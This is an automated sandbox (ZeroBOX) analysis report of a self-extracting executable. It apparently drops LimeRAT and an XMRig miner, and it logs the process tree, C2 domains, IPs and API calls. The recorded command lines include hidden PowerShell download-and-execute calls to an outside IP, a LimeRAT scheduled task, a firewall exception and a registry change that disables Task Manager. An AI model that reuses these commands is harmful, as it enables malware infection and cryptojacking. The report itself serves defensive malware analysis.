Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 12, 2021, 10:40 a.m.	April 12, 2021, 10:53 a.m.

Size	307.8KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`89239d803d0a9f3cfce0cd45e9b78b61`
SHA256	`bf5c2b1b2f63313d0de80352b269a8483fedeb422837d19cdbb1e8b5fc2fda11`
CRC32	`379F63B3`
ssdeep	`6144:8/fAhvV6B8ErzPZp5wdz753RSkKJUHa4UCAsIQBd:YfAv6B8azBwdtK2Ha4UoIc`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara	escalate_priv - Escalade priviledges screenshot - Take screenshot win_registry - Affect system registries win_token - Affect system token win_files_operation - Affect private profile PE_Header_Zero - PE File Signature Zero OS_Processor_Check_Zero - OS Processor Check Signature Zero IsPE32 - (no description) IsWindowsGUI - (no description) HasOverlay - Overlay Check HasDebugData - DebugData Check HasRichSignature - Rich Signature Check

IE.exe "C:\Users\test22\AppData\Local\Temp\IE.exe"
232
- wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\java.vbs"
  3236
  - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat" "
    8324
    - WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
      8152
    - taskkill.exe taskkill /F /IM xmrig.exe
      5888
    - WMIC.exe wmic process where name='xmrig.exe' delete
      8084
    - PING.EXE ping 127.0.0.1 -n 5
      4884
    - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\upd3.vbs"
      5168
      - cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\updateW\1234.bat" "
        2648
        
        WMIC.exe wmic process where name='taskmgr.exe' delete
        2340
        
        WMIC.exe wmic process where name='Taskmgr.exe' delete
        3932
        
        WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        3004
        
        reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        9060
        
        PING.EXE ping 127.0.0.1 -n 5
        3252
        
        wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\1a2.vbs"
        3464
        
        cmd.exe cmd /c ""C:\Users\test22\AppData\Local\Temp\updateW\64a1.bat" "
        5996
        
        svchost.exe "C:\Users\test22\AppData\Local\Temp\updateW\svchost.exe"
        6872
        
        csrss.exe "C:\Users\test22\AppData\Local\Temp\updateW\csrss.exe"
        6792
        
        schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe'"
        1636
        
        svchost.exe "C:\Users\test22\AppData\Roaming\MicrosoftData\svchost.exe"
        2620
        
        powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/win.com','C:\Users\test22\AppData\Local\Temp\updateW\win.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\win.com'
        4560
        
        win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
        6408
        
        powershell.exe PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://34.126.93.163/xm/64a1.com','C:\Users\test22\AppData\Local\Temp\updateW\64a1.com');Start-Process 'C:\Users\test22\AppData\Local\Temp\updateW\64a1.com'
        1844
        
        64a1.com "C:\Users\test22\AppData\Local\Temp\updateW\64a1.com"
        5768
        
        explorer.exe "C:\Windows (x86)\explorer.exe"
        4156
        
        PING.EXE ping 127.0.0.1 -n 90
        4568
        
        wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\z.vbs"
        2456
        
        wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
        6120
        
        wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs"
        7460
        
        wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
        1808
        
        cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\1234.bat"
        3356
    - PING.EXE ping 127.0.0.1 -n 5
      7076
    - cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat"
      6584
netsh.exe netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
7080

Name	Response	Post-Analysis Lookup
muslada2251.ddns.net
muslada2251.ddnsking.com	A 193.218.118.85	193.218.118.85
niogem1171.bounceme.net
pastebin.com	A 104.23.99.190 A 104.23.98.190	104.23.98.190
niogem117.soon.it	A 193.218.118.85	193.218.118.85
niogem1171.freedynamicdns.org	A 193.218.118.85	193.218.118.85
niogem1171.freedynamicdns.net
niogem1171.ddnsking.com
niogem1171.ddns.net
pool.hashvault.pro	A 131.153.159.26 A 131.153.76.130	131.153.159.26
niogem1171.3utilities.com	A 0.0.0.0	0.0.0.0

IP Address	Status	Action
131.153.76.130	Active	Moloch
104.23.98.190	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
193.218.118.85	Active	Moloch
34.126.93.163	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (50 out of 214 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 12, 2021, 10:40 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (12 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:40 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:41 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:41 a.m.			0	0
IsDebuggerPresent April 12, 2021, 10:41 a.m.			0	0

Command line console output was observed (50 out of 119 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: wmic console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: taskkill console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: /F /IM xmrig.exe console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: wmic console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: process where name='xmrig.exe' delete console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: del console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: /q "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*" console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: RD console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: /S /Q "C:\Progrrm\" console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: The system cannot find the file specified. console_handle: 0x0000000b	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: if console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: exist "C:\Windows (x86)\" console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: ping console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: 127.0.0.1 -n 5 console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: "" /d "C:\Users\test22\AppData\Local\Temp/updateW" "word.vbs" console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: else console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: ping console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: 127.0.0.1 -n 5 console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: "" /d "C:\Users\test22\AppData\Local\Temp/updateW" "upd3.vbs" console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: ping console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: 127.0.0.1 -n 5 console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: nul console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: /b "" cmd /c del "C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.bat" console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: exit console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: /b console_handle: 0x00000007	1	1
WriteConsoleA April 12, 2021, 10:40 a.m.	buffer: No Instance(s) Available. console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: ERROR: The process "xmrig.exe" not found. console_handle: 0x0000000b	1	1
WriteConsoleA April 12, 2021, 10:40 a.m.	buffer: No Instance(s) Available. console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: wmic console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: process where name='taskmgr.exe' delete console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: wmic console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: process where name='Taskmgr.exe' delete console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\updateW> console_handle: 0x00000007	1	1
WriteConsoleW April 12, 2021, 10:40 a.m.	buffer: wmic console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00576e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00576c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00576c98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030dcf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ddf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ddf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ddf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ddf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ddf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030ddf0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d8b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e170 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030d9f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:40 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030e670 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043be38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043be38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043be38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b5b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b5b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 12, 2021, 10:41 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0043b5b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 12, 2021, 10:40 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.gfids

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

One or more processes crashed (44 events)

Time & API	Arguments	Status
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b 